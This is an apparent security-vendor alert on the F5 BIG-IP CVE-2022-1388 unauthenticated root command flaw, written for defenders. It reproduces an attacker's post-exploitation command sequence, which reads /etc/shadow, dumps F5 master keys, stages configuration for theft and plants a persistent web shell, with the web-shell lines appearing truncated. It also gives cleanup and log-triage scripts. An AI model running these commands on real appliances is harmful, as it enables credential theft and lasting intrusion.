VULN ALERT: F5 Big-IP appliances vulnerability - CVE-2022-1388

There’s a new vulnerability out there impacting F5 Big-IP appliances (CVE-2022-1388). Since SCYTHE focuses on post-exploitation, we don’t dive too deeply into the vulnerability itself. The good news (for me at least) is that this one is simple to explain:

  • Developers created an API endpoint (/mgmt/tm/util/bash) that allows the threat actor to interface with bash to run commands
  • The API endpoint does not require authentication
  • The web server servicing the API executes the commands as root

Note: technically the web server itself does not run as root, but commands on the bash endpoint are passed to a service that runs them as root (facepalm). This is largely a distinction without a difference since the end result is command execution as the root user.

This is effectively a perfect storm when it comes to exploitation. A threat actor with access to the API endpoint can run commands as root on the F5 appliance. Given the privileged position these appliances typically hold in a network, this is a near worst case scenario. The only saving grace is that the API endpoint can only be exploited from the management interface of the F5 device, which should not be exposed to the Internet. Per security researcher Jacob Baines, it appears there are only about 2,500 F5 devices with management interfaces exposed directly to the Internet.

The SCYTHE CTI team is tracking this vulnerability and one of our friends from Curated Intelligence (Germán Fernández) published post-exploitation activities taken by threat actors.

This great CTI sharing allowed SCYTHE to create an emulation plan to validate detection of this post-exploitation activity. While we wouldn’t expect EDR or other security monitoring to run on an F5 appliance, executing the emulation plan may nonetheless be useful. Security teams can use it to evaluate whether they can see post-exploitation steps, or simulate exploitation to create cleanup scripts.

The command passed to the bash API endpoint for execution is shown in the following screenshot (this is the command executed by one of our provided threats). Note that the endpoint already runs /bin/bash, so the -c parameter can be interpreted as being passed to bash.

The individual commands run are as follows:

echo "====="
cat /etc/hostname
echo "====="
cat /etc/hosts
echo "====="
cat /etc/passwd
echo "====="
cat /etc/shadow
echo "====="
cat /etc/resolv.conf
echo "====="
f5mku -f
echo "====="
f5mku -K
echo "====="
f5mku -Z
echo "====="
mount -o rw,remount /usr
tar zcf /usr/local/www/xui/common/css/2e9928af731.css /config/* /root/.bash_history
echo " /usr/local/www/xui/common/css/e9928af731css.php
echo "echo \" /usr/local/www/xui/common/css/e9928af731css.php" >> /config/startup
mount -o ro,remount /usr

Most of these commands are survey commands that focus on collecting data from the exploited device. The following table lists each command and its intended purpose.

Command | Purpose
cat /etc/hostname | Obtain the hostname of the device.
cat /etc/hosts | Obtain the hosts file (may point to other previously unknown devices on the network).
cat /etc/passwd | Obtain information about valid user accounts on the system.
cat /etc/shadow | Obtain password hashes for users configured for interactive login.
cat /etc/resolv.conf | Enumerate DNS server information.
f5mku -f | Obtain the unit key (serial number) from the F5 device.
f5mku -K | Display the master key from the device.
f5mku -Z | Dump all debug information from the F5.
mount -o rw,remount /usr | Mount the /usr filesystem as read/write. This is necessary to write the web shell.
tar zcf /usr/local/www/xui/common/css/2e9928af731.css /config/* /root/.bash_history | Create a tar file containing all configuration files and the root user’s bash history. This information will aid the threat actor in further post-exploitation activities. The tar file is presumably transferred later by downloading it directly from the integrated web server on the F5.
echo " /usr/local/www/xui/common/css/e9928af731css.php | Write a simple unauthenticated web shell to the file e9928af731css.php. The web shell takes commands from the POST variable “e9928af731” and executes them under the web server context.
echo "echo \" /usr/local/www/xui/common/css/e9928af731css.php" >> /config/startup | Add the web shell command to the /config/startup script. This ensures that even if the web shell is removed, it will be restored the next time the device is rebooted.
mount -o ro,remount /usr | Restore read-only permissions to the /usr filesystem.

Because the F5 web server does not run as root, commands executed through the web shell will not run as root. It’s not entirely clear whether the threat actor is aware of this, or how they intend to regain root privileges through remote access. The web shell does ensure the threat actor retains access to the device even after the vulnerability is patched.

Note that any system you run this threat on will have a web shell in the file /usr/local/www/xui/common/css/e9928af731css.php. If you run the threat emulation on an actual F5 appliance, ensure this file is deleted, since it provides a threat actor access to the appliance (even if you patch the underlying vulnerability).

Additionally, you’ll want to remove the file /usr/local/www/xui/common/css/2e9928af731.css since it contains sensitive data in a web accessible location.
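The following script is an added example for this post, not SCYTHE code and not part of either emulation plan. It checks for the three artifacts described above (the web shell, the staged configuration archive, and the persistence line in /config/startup) and removes them. The artifact paths are the ones named in this post; the optional root-directory argument is this script's own assumption, so the checks can be rehearsed against a staged directory tree before being run on an appliance. The persistence check keys on any /config/startup line that writes into the xui css directory rather than on the exact filename, since a threat actor may rename the web shell but still has to recreate it there.

```shell
#!/bin/sh
# Added example (not SCYTHE's code or part of the emulation plan): verify that
# the post-exploitation artifacts described in the post are gone after a threat
# emulation run, and remove them if not. ROOT is this script's own assumption:
# pass a staged directory tree to exercise the checks off-box; on a real
# appliance pass nothing and "/" is used.

WEBSHELL="usr/local/www/xui/common/css/e9928af731css.php"
CONFIG_TAR="usr/local/www/xui/common/css/2e9928af731.css"
STARTUP="config/startup"

# Report each artifact found under the root given as $1 on stderr and echo the
# total count on stdout, so callers can test it. Persistence is detected by any
# /config/startup line that writes into the xui css directory.
count_artifacts() {
    root="${1:-/}"; root="${root%/}"
    n=0
    for f in "$WEBSHELL" "$CONFIG_TAR"; do
        if [ -e "$root/$f" ]; then
            echo "ARTIFACT $root/$f" >&2
            n=$((n + 1))
        fi
    done
    if [ -f "$root/$STARTUP" ] && grep -q 'xui/common/css' "$root/$STARTUP"; then
        echo "PERSISTENCE $root/$STARTUP:" >&2
        grep -n 'xui/common/css' "$root/$STARTUP" >&2   # show the lines for review
        n=$((n + 1))
    fi
    echo "$n"
}

# Remove the web shell, the staged archive and the persistence line(s).
# /usr is read-only on the appliance (the threat remounts it rw to write the
# files), so the same remount is needed, but only when working on "/".
remove_artifacts() {
    root="${1:-/}"; root="${root%/}"
    [ -z "$root" ] && mount -o rw,remount /usr
    for f in "$WEBSHELL" "$CONFIG_TAR"; do
        rm -f "$root/$f"
    done
    if [ -f "$root/$STARTUP" ]; then
        # Keep every startup line except those writing into the css directory;
        # write back through cat so the file keeps its mode and ownership.
        grep -v 'xui/common/css' "$root/$STARTUP" > "$root/$STARTUP.clean" || true
        cat "$root/$STARTUP.clean" > "$root/$STARTUP"
        rm -f "$root/$STARTUP.clean"
    fi
    [ -z "$root" ] && mount -o ro,remount /usr
    return 0
}

# Usage: sh f5_cleanup_check.sh check [ROOT]   report artifacts, print count
#        sh f5_cleanup_check.sh clean [ROOT]   remove them
case "${1:-}" in
    check) count_artifacts "${2:-/}" ;;
    clean) remove_artifacts "${2:-/}" ;;
esac
```

Run the check first and review the PERSISTENCE lines it prints before cleaning: the script drops every /config/startup line that references the css directory, which is correct for the emulation plan but should be eyeballed on a production appliance.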

If you have an F5 management interface exposed to the Internet, you should consider the appliance compromised. Threat actors are actively scanning for vulnerable systems and by the time you read this blog post, any unpatched system has likely been exploited. After patching an internally facing system, please coordinate with threat hunting or incident response team members to ensure the vulnerability was not exploited before patching was performed. The filenames used for the web shell and configuration data may be modified by threat actors. Careful review of web server logs (beyond the scope of this post) should reveal signs of successful exploitation.
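The log review mentioned above is out of scope for the post, but the activity it describes suggests a few simple triage rules. The script below is an added example, not SCYTHE's code: it scans a management-interface access log and tags requests matching the observed playbook. It assumes the log is in Apache common/combined format (host, ident, user, [date], "METHOD path proto", status, bytes); the F5 httpd log layout may differ, in which case the awk field numbers need adjusting. Because the post notes that filenames may be changed, the rules key on behaviour as well as names: any request to the vulnerable /mgmt/tm/util/bash endpoint, a POST into the static xui css directory (web shell input), a .php file served from that directory, and an oversized "stylesheet" (the staged configuration tarball). The sample log lines are constructed for the example.

```shell
#!/bin/sh
# Added example (not SCYTHE's code): triage a management-interface access log
# for the post-exploitation behaviour described in the post. Assumes Apache
# common/combined log format; adjust the field numbers if the F5 layout differs.

# Read a log from the file given as $1 (or stdin) and print one tagged line per
# suspicious request. Heuristics, all derived from the observed activity:
#   BASH-ENDPOINT  any request to /mgmt/tm/util/bash (the vulnerable endpoint)
#   POST-TO-CSS    a POST into the static xui css directory (web shell input)
#   PHP-IN-CSS     a .php file requested from the css directory (web shell)
#   LARGE-CSS      a "stylesheet" over 1 MiB (the staged configuration tarball)
scan_access_log() {
    awk '
    {
        method = substr($6, 2)      # $6 is "METHOD with the opening quote
        path   = $7
        bytes  = $10 + 0
        if (index(path, "/mgmt/tm/util/bash") == 1) { print "BASH-ENDPOINT " $0; next }
        if (index(path, "/xui/common/css/") > 0) {
            if (method == "POST")          { print "POST-TO-CSS " $0; next }
            if (path ~ /\.php([?]|$)/)     { print "PHP-IN-CSS " $0; next }
            if (bytes > 1048576)           { print "LARGE-CSS " $0; next }
        }
    }' ${1:+"$1"}
}

# Constructed sample log (addresses and timestamps are made up): two benign GUI
# requests followed by the sequence the observed playbook would produce.
sample_log() {
    cat <<'EOF'
10.0.0.5 - - [06/May/2022:10:01:11 +0000] "GET /xui/common/css/xui.css HTTP/1.1" 200 18233
10.0.0.5 - - [06/May/2022:10:01:12 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 200 812
198.51.100.23 - - [06/May/2022:10:05:41 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 1422
198.51.100.23 - - [06/May/2022:10:06:02 +0000] "GET /xui/common/css/e9928af731css.php HTTP/1.1" 200 0
198.51.100.23 - - [06/May/2022:10:06:09 +0000] "POST /xui/common/css/e9928af731css.php HTTP/1.1" 200 301
198.51.100.23 - - [06/May/2022:10:06:30 +0000] "GET /xui/common/css/2e9928af731.css HTTP/1.1" 200 5242880
EOF
}

# Number of findings, for a quick "anything to look at?" answer.
count_findings() {
    scan_access_log "$@" | wc -l | tr -d ' '
}

# Usage: sample_log | scan_access_log        (demo on the constructed lines)
#        scan_access_log /path/to/httpd_access_log   (on an appliance)
```

Any BASH-ENDPOINT hit from an address that is not a known administrator, or any hit at all if the endpoint is not used by your tooling, is worth pulling the full request for; the other three tags point at the artifacts this post describes even if the threat actor has renamed them.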

This is the sort of CTI SCYTHE is starting to push more rapidly to help our customers evaluate their exposures in near real time. Today, we are releasing two threat emulation plans. The first emulation plan runs the commands by decoding a base64 payload into /tmp/ and executing the payload commands. The commands executed in the payload are those detailed above in the post.

Since the entire threat actor script is written as a single action in the SCYTHE platform, you are unable to observe each step. To facilitate observation of each step in the campaign, we have created a second emulation plan which steps through each command individually. If the threat emulation plan is run on a generic Linux system (as opposed to an F5 appliance), you should expect the F5 specific command “f5mku” to fail (it will not be present on the system). Additionally, the “mount” commands will likely fail on a generic Linux system since most systems don’t have a dedicated filesystem for the /usr directory. Finally, the creation of the tar file and web shell will also fail since the full directory structure is not present.

From the herd to you, happy hunting friends!

This post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.